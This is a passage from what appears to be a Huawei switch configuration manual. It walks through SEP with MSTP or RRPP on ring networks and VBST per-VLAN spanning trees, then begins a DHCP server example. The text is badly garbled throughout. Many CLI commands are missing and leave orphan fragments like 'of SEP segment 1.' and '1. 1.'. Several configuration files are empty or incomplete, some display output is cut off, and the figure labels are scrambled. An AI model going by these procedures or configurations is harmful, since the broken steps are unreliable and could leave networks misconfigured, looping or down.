# On PE2, PE3, and PE4, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to
VLAN 100.
The configurations of PE2, PE3, and PE4 are similar to the configuration of PE1, and are
not mentioned here. For details, see configuration files in this example.
On LSW1 and LSW2, create VLAN 100 and add GE1/0/1 to VLAN 100. The
configurations of LSW1 and LSW2 are similar to the configuration of PE1, and are not
mentioned here. For details, see configuration files in this example.
3. Enable MSTP.
# Configure PE1.
[PE1] stp enable
# Configure PE2.
[PE2] stp enable
# Configure PE3.
[PE3] stp enable
# Configure E4.
[PE4] stp enable
# Configure LSW1.
[LSW1] stp enable
# Configure LSW2.
[LSW2] stp enable
4. Configure PE3 as the root bridge and PE4 as the secondary root bridge.
# Set the priority of PE3 to 0 in MSTI 0 to ensure that PE3 functions as the root bridge.
[PE3] stp root primary
# Set the priority of PE4 to 4096 in MSTI 0 to ensure that PE4 functions as the
secondary root bridge.
[PE4] stp root secondary
Step 3 Configure the Layer 2 forwarding function on the CE and LSW1 to LSW3.
The configuration details are not mentioned here. For details, see configuration files in this
example.
# Run the shutdown command on GE1/0/1 of LSW2 to simulate a fault, and then run the
display sep interface command on LSW3 to check whether GE1/0/2 on LSW3 changes from
the discarding state to the forwarding state.
<LSW3> display sep interface gigabitethernet 1/0/2
SEP segment 1
----------------------------------------------------------------
Interface Port Role Neighbor Status Port Status

----------------------------------------------------------------
GE1/0/2 common up forwarding
----End
Configuration Files
l Configuration file of LSW1
#
sysname LSW1
#
vlan batch 10 100
#
region-name RG1
#
sep segment 1
control-vlan 10
block port middle
tc-notify stp
protected-instance 0 to 4094
#
port hybrid tagged vlan 10 100
sep segment 1 edge no-neighbor primary
#
stp disable
sep segment 1
#
return

#
sysname LSW2
#
vlan batch 10 100
#
region-name RG1
#
sep segment 1
control-vlan 10
tc-notify stp
#
sep segment 1 edge no-neighbor secondary
#
stp disable
sep segment 1
#
return

#
sysname LSW3
#

vlan batch 10 100

#
sep segment 1
control-vlan 10
#
stp disable
sep segment 1
#
stp disable
sep segment 1
#
port hybrid tagged vlan vlan 100
#
return

#
sysname PE1
#
vlan batch 100
#
region-name RG1
#
#
#
#
return

#
sysname PE2
#
vlan batch 100
#
region-name RG1
#
#
#

#
return

#
sysname PE3
#
vlan batch 100
#
#
region-name RG1
#
#
#
#
return

#
sysname PE4
#
vlan batch 100
#
#
region-name RG1
#
#
#
#
return
l Configuration file of the CE

#
sysname CE
#
vlan batch 100
#
#
return

Related Content
Videos
Configuring SEP
7.9 Example for Configuring SEP and RRPP on a Network

Overview
Generally, redundant links are used to provide link backup and enhance network reliability.
The use of redundant links, however, may produce loops. Loops cause infinite looping of
packets. Consequently, broadcast storms occur and the MAC address table becomes unstable.
As a result, the communication quality deteriorates, and communication services may even be
interrupted. To block redundant links and ensure that the blocked links can be restored
immediately to resume communication when a link fault occurs on a ring network, you can
deploy SEP and RRPP on the ring network.
Configuration Notes
This example applies to all versions and products.
As shown in Figure 7-11, multiple Layer 2 switching devices at access and aggregation layers
constitute a ring network and connect to the core layer. The aggregation layer uses RRPP to
eliminate redundant links, and the access layer uses SEP.
l When there is no faulty link on the ring network, SEP can eliminate loops on the
Ethernet network.
l When a link fails on the ring network, SEP can fast restore communication between
nodes in the ring.
l The topology change notification function is configured on an edge device in a SEP
segment so that devices on the upper-layer network can detect topology changes on the
lower-layer network in a timely manner.
After receiving a topology change notification from a lower-layer network, a device on
an upper-layer network sends a TC packet to instruct other devices to delete original
MAC addresses and learn new MAC addresses. This ensures nonstop traffic forwarding.

Figure 7-11 SEP and RRPP networking
N e tw o rk
NPE1 NPE2
G E 1 /0 /2
G E 1 /0 /3 G E 1 /0 /3
G E 1 /0 /2
Aggregation
PE3 PE4
G E 1 /0 /1
G E 1 /0 /1
RRPP
G E 1 /0 /2 PE1 P E 2 G E 1 /0 /2
G E 1 /0 /3
G E 1 /0 /1 G E 1 /0 /1
G E 1 /0 /1 G E 1 /0 /1
SEP
LSW 1 S e g m e n t1 LSW 2
G E 1 /0 /2 G E 1 /0 /2
G E 1 /0 /2 G E 1 /0 /1
Access
G E 1 /0 /3 S W 3
L
G E 1 /0 /1
CE
P rim a ry E d g e P o rt
S e co n d a ry E d g e P o rt
VLAN 100 B lo ck P o rt(S E P )
B lo ck P o rt(R R P P )
1. Configure basic SEP functions.

a. Configure SEP segment 1 on PE1, PE2, and LSW1 to LSW3 and configure VLAN
10 as the control VLAN of SEP segment 1.
b. Add PE1, PE2, and LSW1 to LSW3 to SEP segment and configure interface roles
on edge devices (PE1 and PE2) of the SEP segment.
c. On the device where the primary edge interface is located, specify the mode in
which an interface is blocked.
d. Configure a SEP preemption mode to ensure that the specified blocked interface
takes effect when the fault is rectified.
e. Configure the topology change notification function so that the upper-layer network
running RRPP can be notified of topology changes in the SEP segment.
2. Configure basic RRPP functions.

a. Add PE1 to PE4 to RRPP domain 1, configure VLAN 5 as the control VLAN on
PE1 to PE4, and configure the protected VLAN.
b. Configure PE1 as the master node and PE2 to PE4 as the transit nodes on the major
ring, and configure primary and secondary interfaces of the master node.
c. Create VLANs on PE1 to PE4 and add interfaces on the RRPP ring to the VLANs.
3. Configure Layer 2 forwarding on the CE, LSW1 to LSW3, and PE1 to PE4.
NOTE
PEs are aggregation switches, LSWs are access switches, and CEs are user-side switches.
Procedure
Step 1 Configure basic SEP functions.
1. Configure SEP segment 1 and configure VLAN 10 as the control VLAN of SEP segment
1.
# Configure PE1.
[PE1] sep segment 1 //Create SEP segment 1.
[PE1-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of
SEP segment 1.
[PE1-sep-segment1] protected-instance all //Configure all protected instances
of SEP segment 1.
[PE1-sep-segment1] quit
# Configure PE2.
[PE2] sep segment 1 //Create SEP segment 1.
[PE2-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of
SEP segment 1.
[PE2-sep-segment1] protected-instance all //Configure all protected instances
of SEP segment 1.
# Configure LSW1.
of SEP segment 1.
# Configure LSW2.
of SEP segment 1.
# Configure LSW3.
of SEP segment 1.


NOTE
– The control VLAN must be a VLAN that has not been created or used, but the command for
creating a common VLAN is automatically displayed in the configuration file after the control
VLAN is created.
– Each SEP segment must have a control VLAN. After an interface is added to an SEP segment that
has a control VLAN, the interface is automatically added to the control VLAN.
2. Add PE1, PE2, and LSW1 to LSW3 to SEP segment 1 and configure interface roles.
NOTE
By default, STP is enabled on Layer 2 interfaces. Before adding an interface to an SEP segment,
disable STP on the interface.
# Configure PE1.
[PE1-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE1-GigabitEthernet1/0/1] sep segment 1 edge primary //Configure the
interface as the primary edge interface and add it to SEP segment 1.
# Configure LSW1.
[LSW1-GigabitEthernet1/0/1] port link-type trunk
1.
1.
# Configure LSW2.
1.
1.
# Configure LSW3.
1.
1.
# Configure PE2.


[PE2-GigabitEthernet1/0/1] sep segment 1 edge secondary //Configure the
interface as the secondary edge interface and add it to SEP segment 1.
After the configuration is complete, run the display sep topology command on PE1 to
check the topology of the SEP segment. The command output shows that the blocked
interface is one of the two interfaces on the link that last completes neighbor negotiation.
[PE1] display sep topology
SEP segment 1
-------------------------------------------------------------------------
System Name Port Name Port Role Port Status Hop
-------------------------------------------------------------------------
PE1 GE1/0/1 primary forwarding 1
LSW1 GE1/0/1 common forwarding 2
PE2 GE1/0/1 secondary discarding 8
3. Specify a blocked interface.

# In SEP segment 1, set the mode of blocking an interface on PE1 where the primary
edge interface is located to block the interface in the middle of the SEP segment.
[PE1] sep segment 1
[PE1-sep-segment1] block port middle
4. Configure a preemption mode.

# In SEP segment 1, configure the manual preemption mode on PE1 where the primary
edge interface is located.
[PE1-sep-segment1] preempt manual
5. Configure the SEP topology change notification function.

Configure devices in SEP segment 1 to notify the RRPP network of topology changes.
# Configure PE1.
[PE1-sep-segment1] tc-notify rrpp
# Configure PE2.
[PE2] sep segment 1
[PE2-sep-segment1] tc-notify rrpp
After the configuration is complete, perform the following operations to verify the
configuration. PE1 is used as an example.
l Run the display sep topology command on PE1 to check the topology of the SEP
segment.
The command output shows that GE1/0/2 of LSW3 is in discarding state and other
interfaces are in forwarding state.
[PE1] display sep topology
SEP segment 1
-------------------------------------------------------------------------
System Name Port Name Port Role Port Status Hop
-------------------------------------------------------------------------
PE1 GE1/0/1 primary forwarding 1
LSW3 GE1/0/2 common discarding 4


PE2 GE1/0/1 secondary forwarding 8
l Run the display sep interface verbose command on PE1 to check detailed information
about interfaces in the SEP segment.
[PE1] display sep interface verbose
SEP segment 1
Control-vlan :10
Preempt Delay Timer :0
TC-Notify Propagate to :rrpp
----------------------------------------------------------------
Interface :GE1/0/1
Port Role :Config = primary / Active = primary
Port Priority :64
Port Status :forwarding
Neighbor Status :up
Neighbor Port :LSW1 - GE1/0/1 (00e0-0829-7c00.0000)
NBR TLV rx :2124 tx :2126
LSP INFO TLV rx :2939 tx :135
LSP ACK TLV rx :113 tx :768
PREEMPT REQ TLV rx :0 tx :3
PREEMPT ACK TLV rx :3 tx :0
TC Notify rx :5 tx :3
EPA rx :363 tx :397
Step 2 Configure basic RRPP functions.

1. Add PE1 to PE4 to RRPP domain 1, configure VLAN 5 as the control VLAN on PE1 to
PE4, and configure the protected VLAN.
# Configure PE1.
[PE1-mst-region] instance 1 vlan 5 6 100 //Map VLAN 5, VLAN 6, and VLAN 100
to MSTI 1.
configuration.
[PE1] rrpp domain 1 //Create RRPP domain 1.
[PE1-rrpp-domain-region1] control-vlan 5 //Configure VLAN 5 as the control
VLAN of RRPP domain 1.
[PE1-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure the
protected VLAN in protected instance 1.
# Configure PE2.
to MSTI 1.
configuration.
# Configure PE3.
to MSTI 1.
configuration.

# Configure PE4.
to MSTI 1.
configuration.
NOTE
The control VLAN must be a VLAN that has not been created or used, but the command for creating a
common VLAN is automatically displayed in the configuration file after the control VLAN is created.
2. Create a VLAN and add interfaces on the ring network to the VLAN.
[PE1] vlan 100
[PE1-vlan100] quit
[PE2] vlan 100
[PE2-vlan100] quit
# On PE3, create VLAN 100 and add GE1/0/1 and GE1/0/2 to VLAN 100.
[PE3] vlan 100
[PE3-vlan100] quit


# On PE4, create VLAN 100 and add GE1/0/1 and GE1/0/2 to VLAN 100.
[PE4] vlan 100
[PE4-vlan100] quit
3. Configure PE1 as the master node and PE2 to PE4 as the transit nodes on the major ring,
and configure primary and secondary interfaces of the master node.
# Configure PE1.
[PE1] rrpp domain 1 //Enter the view of RRPP domain 1.
[PE1-rrpp-domain-region1] ring 1 node-mode master primary-port
gigabitethernet 1/0/2 secondary-port gigabitethernet 1/0/3 level 0 //
Configure the master node on RRPP primary ring 1 in RRPP domain 1, and
configure GE1/0/2 as the primary interface and GE1/0/3 as the secondary
interface.
[PE1-rrpp-domain-region1] ring 1 enable //Enable the RRPP ring.
# Configure PE2.
[PE2-rrpp-domain-region1] ring 1 node-mode transit primary-port
Configure the transit node on RRPP primary ring 1 in RRPP domain 1, and
interface.
# Configure PE3.
Configure the transit node on RRPP primary ring 1 in RRPP domain 1, and
interface.
# Configure PE4.
gigabitethernet1/0/1 secondary-port gigabitethernet1/0/2 level 0 //Configure
the transit node on RRPP primary ring 1 in RRPP domain 1, and configure
GE1/0/1 as the primary interface and GE1/0/2 as the secondary interface.
4. Enable RRPP.
# Configure PE1.
[PE1] rrpp enable
# Configure PE2.
[PE2] rrpp enable
# Configure PE3.
[PE3] rrpp enable
# Configure PE4.
[PE4] rrpp enable

After the configuration is complete, run the display rrpp brief or display rrpp verbose
domain command. PE1 is used as an example.
[PE1] display rrpp brief

Domain Index : 1
----------------------------------------------------------------------------
According to the preceding information, RRPP is enabled on PE1; the major control VLAN is
VLAN 5 and the sub-control VLAN is VLAN 6 in RRPP domain 1; VLANs mapping
Instance1 are protected VLANs; PE1 is the master node in ring 1; the primary interface is
GE1/0/2 and the secondary interface is GE1/0/3.
[PE1] display rrpp verbose domain 1
Domain Index : 1
RRPP Ring : 1
Ring Level : 0
Node Mode : Master
The major control VLAN is VLAN 5 and the sub-control VLAN is VLAN 6 in RRPP domain
1; VLANs mapping Instance1 are protected VLANs; PE1 is the master node in Complete
state; the primary interface is GE1/0/2 and the secondary interface is GE1/0/3.
Step 3 Configure Layer 2 forwarding on the CE, LSW1 to LSW3, and PE1 to PE4.
The configuration details are not mentioned here. For details, see configuration files in this
example.
# Run the shutdown command on GE1/0/1 of LSW2 to simulate a fault, and then run the
display sep interface command on LSW3 to check whether GE1/0/2 on LSW3 changes from
the discarding state to the forwarding state.
[LSW3] display sep interface gigabitethernet 1/0/2
SEP segment 1
----------------------------------------------------------------
Interface Port Role Neighbor Status Port Status
----------------------------------------------------------------
GE1/0/2 common up forwarding
----End

Configuration Files
#
sysname LSW1
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
#
stp disable
sep segment 1
#
stp disable
sep segment 1
#
return

#
sysname LSW2
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
#
stp disable
sep segment 1
#
stp disable
sep segment 1
#
return

#
sysname LSW3
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
#
stp disable
sep segment 1
#

stp disable
sep segment 1
#
#
return
#
sysname PE1
#
vlan batch 5 to 6 10 100
#
rrpp enable
#
instance 1 vlan 5 to 6 100
#
rrpp domain 1
control-vlan 5
ring 1 node-mode master primary-port GigabitEthernet 1/0/2 secondary-port
GigabitEthernet 1/0/3 level 0
ring 1 enable
#
sep segment 1
control-vlan 10
block port middle
tc-notify rrpp
#
stp disable
sep segment 1 edge primary
#
port trunk allow-pass vlan 5 to 6 100
stp disable
#
stp disable
#
return
#
sysname PE2
#
#
rrpp enable
#
#
rrpp domain 1
control-vlan 5
ring 1 node-mode transit primary-port GigabitEthernet 1/0/2 secondary-port
ring 1 enable

#
sep segment 1
control-vlan 10
tc-notify rrpp
#
stp disable
sep segment 1 edge secondary
#
stp disable
#
stp disable
#
return
#
sysname PE3
#
#
rrpp enable
#
#
rrpp domain 1
control-vlan 5
ring 1 enable
#
stp disable
#
port trunk allow-pass vlan 5 to 6 100 200
stp disable
#
return
#
sysname PE4
#
#
rrpp enable
#
#
rrpp domain 1
control-vlan 5


ring 1 enable
#
stp disable
#
port trunk allow-pass vlan 5 to 6 100 200
stp disable
#
return

#
sysname CE1
#
vlan batch 100
#
#
return
7.10 Example for Configuring VBST
VBST Overview
VLAN-based Spanning Tree (VBST), a Huawei proprietary protocol, constructs a spanning
tree in each VLAN so that traffic from different VLANs can be forwarded through different
spanning trees. VBST is equivalent to the Spanning Tree Protocol (STP) or Rapid Spanning
Tree Protocol (RSTP) running in each VLAN. Spanning trees in different VLANs are
independent of each other.
Currently, there are three standard spanning tree protocols: STP, RSTP, and Multiple Spanning
Tree Protocol (MSTP). STP and RSTP cannot implement VLAN-based load balancing,
because all the VLANs on a LAN share a spanning tree and packets in all VLANs are
forwarded along this spanning tree. In addition, the blocked link does not carry any traffic,
which wastes bandwidth and may cause a failure to forward packets from some VLANs. In
real-world situations, MSTP is preferred because it is compatible with STP and RSTP, ensures
fast convergence, and provides multiple paths to load balance traffic.
On enterprise networks, enterprise users need functions that are easy to use and maintain,
whereas the configuration of MSTP multi-instance and multi-process are complex and has
high requirements for engineers' skills.
To address this issue, Huawei develops VBST. VBST constructs a spanning tree in each
VLAN so that traffic from different VLANs is load balanced along different spanning trees. In
addition, VBST is easy to configure and maintain.
Configuration Notes
When configuring VBST on the switch, pay attention to the following points:
l When VBST is enabled on a ring network, VBST immediately starts spanning tree
calculation. Parameters such as the device priority and port priority affect spanning tree

calculation, and change of these parameters may cause network flapping. To ensure fast
and stable spanning tree calculation, perform basic configurations on the switch and
interfaces before enabling VBST.
l If the protected instance has been configured in a SEP segment or ERPS ring but the
mapping between protected instances and VLANs is not configured, VBST cannot be
enabled.
l VBST cannot be enabled in the ignored VLAN or control VLAN used by ERPS, RRPP,
SEP, or Smart Link.
l If 1:N (N>1) mapping between MSTIs and VLANs has been configured on the switch,
you must delete the mapping before changing the STP working mode to VBST.
l If stp vpls-subinterface enable has been configured on the switch, you must run the
undo stp vpls-subinterface enable command on the interface before changing the STP
working mode to VBST.
l If the device has been configured as the root bridge or secondary root bridge, run the
undo stp vlan { vlan-id1 [ to vlan-id2 ] } &<1-10> root command to disable the root
bridge or secondary root bridge function and run the stp vlan { vlan-id1 [ to vlan-id2 ] }
&<1-10> priority priority command to change the device priority.
l When more than 128 MSTIs are dynamically specified, STP is disabled in a created
VLAN in the configuration file, for example, stp vlan 100 disable.
l To prevent frequent network flapping, ensure that the values of Hello time, Forward
Delay, and Max Age conform to the following formulas:
– 2 x (Forward Delay - 1.0 second) >= Max Age
– Max Age >= 2 x (Hello Time + 1.0 second)
l It is recommended that fast convergence in normal mode be used. If the fast mode is
used, frequently deleting ARP entries may result in 100% CPU usage of the MPU and
LPU. As a result, packet processing expires and network flapping occurs.
l After all ports are configured as edge ports and BPDU filter ports in the system view,
none of ports on the switch send BPDUs or negotiate the VBST status with directly
connected ports on the peer device. All ports are in forwarding state. This may cause
loops on the network, leading to broadcast storms. Exercise caution when you configure
a port as an edge port and BPDU filter port.
l After a port is configured as an edge port and BPDU filter port in the interface view, the
port does not process or send BPDUs. The port cannot negotiate the VBST status with
the directly connected port on the peer device. Exercise caution when you configure a
port as an edge port and BPDU filter port.
l Root protection takes effect only on designated ports.
l An alternate port is the backup of the root port. If a switch has an alternate port, you need
to configure loop protection on both the root port and alternate port.
As shown in Figure 7-12, SwitchC and SwitchD (access switches) are dual-homed to
SwitchA and SwitchB (aggregation switches). SwitchC transmits traffic from VLAN 10 and
VLAN 20, and SwitchD transmits traffic from VLAN 20 and VLAN 30. A ring network is
formed between the access layer and aggregation layer. The enterprise requires that service
traffic in each VLAN be correctly forwarded and service traffic from different VLANs be
load balanced to improve link use efficiency.

Figure 7-12 VBST networking
C o re N e tw o rk
G E 1 /0 /1 G E 1 /0 /1
VLAN 10, 20, 30
G E 1 /0 /3 G E 1 /0 /2 G E 1 /0 /2 G E 1 /0 /3
VLAN 10, 20 VLAN 20, 30

2 0 VL
1 0, AN
AN 20
,3
VL 0
G E 1 /0 /3 G E 1 /0 /3
G E 1 /0 /2 G E 1 /0 /2
S w itc h C S w itc h D
G E 1 /0 /4 G E 1 /0 /5 G E 1 /0 /4 G E 1 /0 /5
VLAN 10 VLAN 20 VLAN 20 VLAN 30
S p a n n in g tre e S p a n n in g tre e S p a n n in g tre e

fo r V L A N 1 0 fo r V L A N 2 0 fo r V L A N 3 0
R o o t b rid g e
U n b lo cke d lin k
B lo cke d lin k
B lo cke d p o rt
VBST can be used to eliminate loops between the access layer and aggregation layer and
ensures that service traffic in each VLAN is correctly forwarded. In addition, traffic from
different VLANs can be load balanced. The configuration roadmap is as follows:
1. Configure Layer 2 forwarding on access and aggregation switches.

2. Configure basic VBST functions on SwitchA, SwitchB, SwitchC, and SwitchD. Perform
the following operations so that a spanning tree shown in Figure 7-12 is formed through
calculation:
– Configure SwitchA and SwitchB as the root bridge and secondary root bridge of
VLAN 10 respectively, configure SwitchA and SwitchB as the root bridge and
secondary root bridge of VLAN 20 respectively, and configure SwitchB and
SwitchA as the root bridge and secondary root bridge of VLAN 30 respectively, to
ensure root bridge reliability.
– Set a larger path cost for GE1/0/2 on SwitchC in VLAN 10 and VLAN 20 so that
GE1/0/2 is blocked in spanning trees of VLAN 10 and VLAN 20, and set a larger

path cost for GE1/0/2 on SwitchD in VLAN 20 and VLAN 30 so that GE1/0/2 is
blocked in the spanning tree of VLAN 20 and VLAN 30.
3. Configure ports on SwitchC and SwitchD connected to terminals as edge ports to reduce
VBST topology calculation and improve topology convergence.
Procedure
l Create VLAN 10, VLAN 20, and VLAN 30 on SwitchA, SwitchB, SwitchC, and
SwitchD.
# Create VLAN 10, VLAN 20, and VLAN 30 on aggregation switch SwitchA.
[SwitchA] vlan batch 10 20 30
# Create VLAN 10, VLAN 20, and VLAN 30 on aggregation switch SwitchB.
[SwitchB] vlan batch 10 20 30
# Create VLAN 10 and VLAN 20 on access switch SwitchC.

[SwitchC] vlan batch 10 20
# Create VLAN 20 and VLAN 30 on access switch SwitchD.

[SwitchD] vlan batch 20 30

# Add GE1/0/1 on SwitchA to VLAN 10, VLAN 20, and VLAN 30.
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30


# Add GE1/0/1 on SwitchB to VLAN 10, VLAN 20, and VLAN 30.
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30



# Add GE1/0/2 on SwitchC to VLAN 10 and VLAN 20.

[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 20
# Add GE1/0/3 on SwitchC to VLAN 10 and VLAN 20.

# Add GE1/0/4 on SwitchC to VLAN 10 and GE1/0/5 to VLAN 20.

# Add GE1/0/2 on SwitchD to VLAN 20 and VLAN 30.

[SwitchD-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 30
# Add GE1/0/3 on SwitchD to VLAN 20 and VLAN 30.

[SwitchD-GigabitEthernet1/0/3] port trunk allow-pass vlan 20 30
# Add GE1/0/4 on SwitchD to VLAN 20 and GE1/0/5 to VLAN 30.

Step 2 Configure basic VBST functions.

1. Configure switches on the ring network to work in VBST mode.
# Configure SwitchA to work in VBST mode.
[SwitchA] stp mode vbst
# Configure SwitchB to work in VBST mode.

[SwitchB] stp mode vbst
# Configure SwitchC to work in VBST mode.

[SwitchC] stp mode vbst
# Configure SwitchD to work in VBST mode.

[SwitchD] stp mode vbst

– Configure the root bridge and secondary root bridge in VLAN 10.
# Configure SwitchA as the root bridge in VLAN 10.

[SwitchA] stp vlan 10 root primary
# Configure SwitchB as the secondary root bridge in VLAN 10.

[SwitchB] stp vlan 10 root secondary
# Configure SwitchA as the root bridge in VLAN 20.
[SwitchA] stp vlan 20 root primary
# Configure SwitchB as the secondary root bridge in VLAN 20.

[SwitchB] stp vlan 20 root secondary
# Configure SwitchB as the root bridge in VLAN 30.
[SwitchB] stp vlan 30 root primary
# Configure SwitchA as the secondary root bridge in VLAN 30.

[SwitchA] stp vlan 30 root secondary
3. Configure the path cost for a port in each VLAN so that the port can be blocked.
NOTE
– The path cost range depends on the algorithm. IEEE 802.1t standard is used as an example. Set
the path costs of the ports to be blocked to 2000000.
– All switches on the same network must use the same path cost calculation method.
# Set the path cost of GE1/0/2 on SwitchC to 2000000 in VLAN 10 and VLAN 20.
[SwitchC-GigabitEthernet1/0/2] stp vlan 10 cost 2000000
[SwitchC-GigabitEthernet1/0/2] stp vlan 20 cost 2000000
# Set the path cost of GE1/0/2 on SwitchD to 2000000 in VLAN 20 and VLAN 30.
[SwitchD-GigabitEthernet1/0/2] stp vlan 20 cost 2000000
[SwitchD-GigabitEthernet1/0/2] stp vlan 30 cost 2000000
4. Enable VBST to eliminate loops.

– Disable VBST in VLAN 1 on all devices.
NOTE
By default, all ports join VLAN 1 and VBST is enabled in VLAN 1. To reduce spanning tree
calculation, disable VBST in VLAN 1. To prevent loops in VLAN 1 after VBST is disabled,
delete ports from VLAN 1.
# Disable VBST in VLAN 1 on SwitchA.
[SwitchA] stp vlan 1 disable
# Disable VBST in VLAN 1 on SwitchB.

[SwitchB] stp vlan 1 disable
# Disable VBST in VLAN 1 on SwitchC.

[SwitchC] stp vlan 1 disable
# Disable VBST in VLAN 1 on SwitchD.

[SwitchD] stp vlan 1 disable
# Delete GE1/0/1, GE1/0/2, and GE1/0/3 on SwitchA from VLAN 1.



# Delete GE1/0/1, GE1/0/2, and GE1/0/3 on SwitchB from VLAN 1.

[SwitchB-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
# Delete GE1/0/2, and GE1/0/3 on SwitchB from VLAN 1.

[SwitchC-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchC-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
# Delete GE1/0/2, and GE1/0/3 on SwitchD from VLAN 1.

[SwitchD-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchD-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
– Enable VBST in a VLAN.

By default, VBST is enabled in a VLAN.
Run the display stp vlan vlan-id command to check the VBST status. If the
message "The protocol is disabled" is displayed, VBST is disabled in the VLAN.
Run the stp vlan vlan-id enable command in the system view to enable VBST in
the VLAN.
– Enable VBST on a port.
By default, VBST is enabled on a Layer 2 Ethernet interface.
Run the display stp interface interface-type interface-number command to check
the VBST status on a port. If the message "The protocol is disabled" is displayed,
VBST is disabled on the port. Run the stp enable command in the interface view to
enable VBST on the port.
Step 3 Configure ports connected to terminals as edge ports to improve topology convergence.
# On SwitchC and SwitchD, configure GE1/0/4 and GE1/0/5 connected to terminals as edge
ports.

# Run the display stp bridge local command on SwitchA to check the STP working mode.
[SwitchA] display stp bridge local
VLAN-ID Bridge ID Hello Max Forward Protocol
Time Age Delay
----- -------------------- ----- --- ------- ---------------------------
10 0.0200-0000-6703 2 20 15 VBST
20 0.0200-0000-6703 2 20 15 VBST
30 4096.0200-0000-6703 2 20 15 VBST
The preceding information shows that the VBST mode is used.
# Run the display stp brief command on SwitchA to check the port status.
VLAN-ID Port Role STP State Protection
The preceding information shows that SwitchA participates in spanning tree calculation in
VLAN 10, VLAN 20, and VLAN 30. For example, SwitchA is the root bridge in VLAN 10
and VLAN 20, so GE1/0/1 and GE1/0/3 in VLAN 10 are selected as designated ports.
GE1/0/1, GE1/0/2, and GE1/0/3 in VLAN 20 are selected as designated ports. SwitchA is the
secondary root bridge in VLAN 30, so GE1/0/1 is selected as the root port and GE1/0/2 is
selected as the designated port in VLAN 30.
# Run the display stp vlan 10 command on SwitchA to check detailed information about
VLAN 10.
[SwitchA] display stp vlan 10
-------[VLAN 10 Global Info]-------
Bridge ID :0 .0200-0000-6703
Config Times :Hello 2s MaxAge 20s FwDly 15s
Active Times :Hello 2s MaxAge 20s FwDly 15s
Root ID / RPC :0 .0200-0000-6703 / 0 (This bridge is the root)
RootPortId :0.0
Root Type :Primary
----[Port4093(GigabitEthernet1/0/1)][FORWARDING]----
Port Role :Designated Port
Port Priority :128
Port Cost(Dot1T) :Config=Auto / Active=20000
Desg. Bridge/Port :0 .0200-0000-6703 / 128.4093
Port Edged :Config=Default / Active=Disabled
Point-to-point :Config=Auto / Active=true
Transit Limit :6 packets/hello
Protection Type :None
----[Port4092(GigabitEthernet1/0/3)][FORWARDING]----
Port Role :Designated Port
Port Priority :128
Port Cost(Dot1T) :Config=Auto / Active=199999
Desg. Bridge/Port :0 .0200-0000-6703 / 128.4092
Port Edged :Config=Default / Active=Disabled
Point-to-point :Config=Auto / Active=true
Transit Limit :6 packets/hello
Protection Type :None
The preceding information shows that SwitchA is selected as the root bridge in VLAN 10 and
GE1/0/1 and GE1/0/3 are selected as designated ports in FORWARDING state.

# Run the display stp brief command on SwitchB, SwitchC, and SwitchD to check the port
status.
[SwitchD] display stp brief
The preceding information shows that SwitchB participates in spanning tree calculation in
VLAN 10, VLAN 20, and VLAN 30, SwitchC participates in spanning tree calculation in
VLAN 10 and VLAN 20, and SwitchD participates in spanning tree calculation in VLAN 20
and VLAN 30. After the calculation is complete, ports are selected as different roles to
eliminate loops.
Different spanning trees are formed in VLAN 10, VLAN 20, and VLAN 30, and traffic in
VLAN 10, VLAN 20, and VLAN 30 is forwarded along different spanning trees to implement
load balancing.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 20 30
#
stp mode vbst
#
stp vlan 1 disable
stp vlan 30 root secondary
stp vlan 10 20 root primary
#
#
#


#
return

#
sysname SwitchB
#
vlan batch 10 20 30
#
stp mode vbst
#
stp vlan 1 disable
stp vlan 10 20 root secondary
stp vlan 30 root primary
#
#
#
#
return

#
sysname SwitchC
#
vlan batch 10 20
#
stp mode vbst
#
stp vlan 1 disable
#
stp vlan 10 20 cost 2000000
#
#
#
#
return

#
sysname SwitchD
#
vlan batch 20 30
#
stp mode vbst
#
stp vlan 1 disable
#
stp vlan 20 30 cost 2000000
#
#
#
#
return

Typical Configuration Examples 8 Typical IP Service Configuration
8 Typical IP Service Configuration
About This Chapter
8.1 Typical DHCP Configuration

8.1 Typical DHCP Configuration
8.1.1 Example for Configuring the Device as a DHCP Server

(Based on the Interface Address Pool)
DHCP Server Overview
Users require that all terminals on a network dynamically obtain network parameters such as
IP addresses, DNS server IP address, routing information, and gateway information. The users
do not need to manually configure the network parameters including terminal IP addresses. In
addition, some mobile terminals (for example, mobile phones, tablets, and laptops) should
support plug-and-play, without modification on network parameters each time. To meet these
requirements, the DHCP server function can be configured on an aggregation-layer user
gateway or a core-layer device to assign network parameters such as IP addresses to
terminals.
The Dynamic Host Configuration Protocol (DHCP) uses the client/server mode to
dynamically configure and uniformly manage network parameters for users. The DHCP
server uses an address pool to assign network parameters such as IP addresses to the users.
The global address pool or an interface address pool can be used.
The configuration of an interface address pool is simple, which can be used only when the
users and DHCP server belong to the same network segment and the server can only assign
network parameters to the users on the interface. It is applicable to small networks with a
limited number of devices and controllable configuration and maintenance workload. After
the DHCP server function based on the interface address pool is configured on the user
gateway, the hosts and mobile terminals on the interface can automatically obtain network
parameters such as IP addresses, without manual configuration and modification.
Compared with an interface address pool, the global address pool can be applied to large
networks. The DHCP server function based on the global address pool should be configured
on a core device, or an exclusive DHCP server be used to assign network parameters such as
IP addresses. The user gateway only needs to be enabled with the DHCP relay function. For
details, see 8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same
Network).
Configuration Notes
This example applies to all versions of the S12700 switches.
NOTE
As show in Figure 8-1, an enterprise divides two network segments for office terminals:
10.1.1.0/24 for employees with fixed office terminals and 10.1.2.0/24 for employees on
business trips to temporarily access the network. The enterprise requires that DHCP be used
to assign IP addresses to employees with fixed office terminals and employees on business
